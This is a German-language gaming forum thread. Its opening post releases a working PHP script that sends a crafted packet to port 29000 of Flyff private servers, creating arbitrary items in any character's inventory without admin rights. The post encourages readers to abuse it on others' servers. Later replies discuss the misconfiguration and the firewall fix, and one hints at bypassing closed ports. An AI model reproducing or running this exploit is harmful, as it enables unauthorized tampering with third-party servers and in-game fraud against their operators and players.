Dardan (26.04.11)
Hallo liebe M-Core Community! :D
Mit dem folgenden PHP-Script könnt ihr auf jedem Server, jedes Item Ingame erstellen auch ohne GM Rechte (sogar wenn es nicht euer Character ist).
Der Server muss dafür aber den Port "29000" offen haben.
Gibt dazu das in eurem Browser ein [Um Links zu sehen registriere dich bitte. Klicke hier.].
Kommt "Warte auf antwort.." oder ein Angebot zum Downloaden, dann ist er offen!
PHP Code:
Eure eigene Character ID könnt ihr via Cheat Engine herausfinden.PHP-Code:<?php
$Server_IP = '127.0.0.1'; //Hier die IP des Server's
$m_idPlayer = (INT)1; //Eure ID eures Characters ohne 0 am anfang!
$ItemID = 26456; //Die ID des Items (kann man in defineitem.h) sehen
$ItemCnt = 99;// Die Menge die in euer Inventory gesetzt wird!
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$packet = pack("VVVVV", 01, $m_idPlayer, 0, $ItemID, $ItemCnt) . str_pad("", 24, ' ') . pack("V", 1);
if(socket_connect($socket, $Server_IP, 29000))
socket_write($socket, $packet, strlen($packet));
socket_close($socket);
?>
Hier noch ein kleines Video bezüglich des Hacks.
Hf damit und imemr schön Perins erstellen damit die Server betreieber endlich mal den Port 29000 zu machen.
mfg ~UnDeaDAnGeL
Credits gehen zu 100% an Yannickmama aka. yannickminecraft
gut das ich den damals schon gheblockt hatte :D
Na dann haben die Pserver-Betreiber ja mal wieder was zu tuen =)
GrußMinecraft! lll
xDrago
Jag mi ni, mei bauch is voll tschokli!
einfach in der firewall port 29000 blocken :(
Jo aber bis die Bertreiber diesen Theard gelesen haben und das gemacht haben können 10 gamer Beispielsweise schon 1000 perins haben und donator weapons...
mfg ~ UnDeaDAnGeL
Schon erledigt xD
Ganz im ernst, wer den Port überhaupt auf hat gehört geschlagen..
Sry, aber es hieß schon vor über einem Jahr welche Server / Ports frei sein müssen und auch nur dürfen! Wir erinnern uns an das Massen Dc'n durch den CoreServer x]
Mfg
Till
Dardan (26.04.11)
Das ist jetzt nicht wirklich dein ernst oder?
GrußMinecraft! lll
xDrago
Jag mi ni, mei bauch is voll tschokli!
blanK (26.04.11), Extension (29.04.11), IceCreamPepper (28.04.11), Lalox3 (02.06.11),(26.04.11)UnDeaDAnGeL
SChon okay ich habs verstanden XD
Ja...diese kleinen und feinen Sicherheitslücken. Wenn man die Firewall nicht richtig Konfiguriert dann passiert sowas.
Einfach Port 29000 schließen. Für Flyff braucht man ja auch nur 3 Ports offen haben damit Spieler Connecten können. Certifier, Login und Chache.
Das ist in keinster Weise eine Sicherheitslücke wenn man weiß wie man mit der Software umzugehen hat. Ist schließlich ein Feature, dass OffiFlyff nutzt. Sogar viele pServer nutzen genau diese Methode bei ihrem Cash Shop.
Dardan (26.04.11)
Dann ist es ein fehler bei der Konfiguration. Es kommt auf selber hinaus mein lieber fnL...du kannst dir InGame Vorteile verschaffen und somit...einfach nicht drum herum Disskutieren. Die Lösung ist einfach und gut ist.
Es geht auch mit anderen Ports wenn man weiß wie ;)
und selbst wenn der port zu ist und nicht ganz gut gesichert kann man den Port von außen öffnen.
Ist yannick überhaupt einverstanden das man sein Script hier Releast?
btw Quelle noch dazu schreiben.
[Um Links zu sehen registriere dich bitte. Klicke hier.]
Lesezeichen